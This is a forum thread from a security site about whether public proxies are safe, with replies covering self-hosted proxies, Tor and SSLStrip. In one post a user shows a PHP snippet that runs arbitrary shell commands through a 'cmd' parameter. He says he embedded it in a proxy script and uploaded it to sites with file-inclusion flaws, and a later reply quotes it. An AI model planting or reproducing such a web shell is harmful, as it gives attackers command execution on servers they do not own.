Proxy Question
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Proxy Question

  1. #1
    Junior Member simplesi's Avatar
    Join Date
    Aug 2010
    Posts
    5

    Proxy Question

    Hi all,

    i'm a newbie to security, not PC's in general. So don't be afraid to get technical.

    I have seen many websites suggesting hackers use proxies to be anonymous online and that your average user could even be using a proxy.

    The question i have is: programs like IP Hider Platinum are a joke in my experience, they rarely work properly and some web based proxy servers have been known to keylog users to steal data.

    How can you ensure the proxy you're using is safe?

    Look forward to some answers.

  2. #2
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    Location
    SW MO
    Posts
    1,188
    Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.

    I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

    -HST

  3. #3
    Member
    Join Date
    Jul 2009
    Posts
    45
    Agree with Westin.. but simply put.. unless the proxy is one you've setup, or was setup and maintained by someone you know you can trust, then you can't be sure its safe ...

    ... and also any lax attitudes in maintaining the proxy and the server its running on, also leads to an unsafe proxy (ie. server gets compromised, and no one notices for a few days..)

  4. #4
    Only african to own a PC! Cider's Avatar
    Join Date
    Jun 2003
    Location
    Israel
    Posts
    1,683
    Used TOR before to bypass contents filters unable of scanning encrypted however its damm slow :P
    The world is a dangerous place to live; not because of the people who are evil, but because of the people who don't do anything about it.
    Albert Einstein

  5. #5
    AOs Resident Troll
    Join Date
    Nov 2003
    Posts
    3,152
    We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging

    MLF
    How people treat you is their karma- how you react is yours-Wayne Dyer

  6. #6
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    Location
    SW MO
    Posts
    1,188
    Quote Originally Posted by morganlefay View Post
    We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging

    MLF
    Hahaha! That is great.
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

    -HST

  7. #7
    Banned
    Join Date
    Jan 2008
    Posts
    605
    I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
    PHP Code:
    if(isset($_REQUEST['cmd'])){
        echo 
    "<pre>";
        
    system($_REQUEST['cmd']);           
        die; 
    to double as a web based shell aswell. I would look for a site vulnerable to remote file inclusion, upload it, then I trolled other sites.

    Heh I litterally ran out publicly used web based proxys. It would have been cool if the mods here setup some sort of NORAD-like geographical graph of it all.

  8. #8
    Junior Member simplesi's Avatar
    Join Date
    Aug 2010
    Posts
    5
    Quote Originally Posted by westin View Post
    Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.

    I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
    thanks Westin.

    I've had a look at Tor and i've got some more questions;

    How is Tor more safe than other proxies?
    When you mention SSL Strip on exit nodes, do you mean the end client could be in effect, waiting to attack your PC?

    Personally i'm just researching security at the moment. I've had a quick look around and i think Tor looks like it'd be excellent as a way of bypassing web/content filters etc but you mention it's not good for security? Can you elaborate on this?

  9. #9
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Quote Originally Posted by The-Spec View Post
    I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
    PHP Code:
    if(isset($_REQUEST['cmd'])){
        echo 
    "<pre>";
        
    system($_REQUEST['cmd']);           
        die; 
    to double as a web based shell aswell.
    Dude...That's actually kind of neat!
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  10. #10
    HYBR|D
    Guest
    Quote Originally Posted by morganlefay View Post
    We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging

    MLF

    That got a smile on my dial. How much was he suckered to pay? Have you had a word to him about it? maybe a print out of he's activities..

Similar Threads

  1. Proxy question.
    By kilerboots in forum Newbie Security Questions
    Replies: 5
    Last Post: April 22nd, 2003, 02:22 PM
  2. Proxy Liability Question
    By instronics in forum Miscellaneous Security Discussions
    Replies: 2
    Last Post: January 17th, 2003, 01:40 PM
  3. Quick question about blocked sites when I have proxy server enabled in win2k
    By tenguzero in forum Microsoft Security Discussions
    Replies: 1
    Last Post: March 16th, 2002, 05:11 AM
  4. Anonymity on the web
    By E5C4P3 in forum The Security Tutorials Forum
    Replies: 4
    Last Post: March 1st, 2002, 05:34 AM
  5. Proxy Tutorial
    By Ennis in forum The Security Tutorials Forum
    Replies: 4
    Last Post: November 28th, 2001, 03:27 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides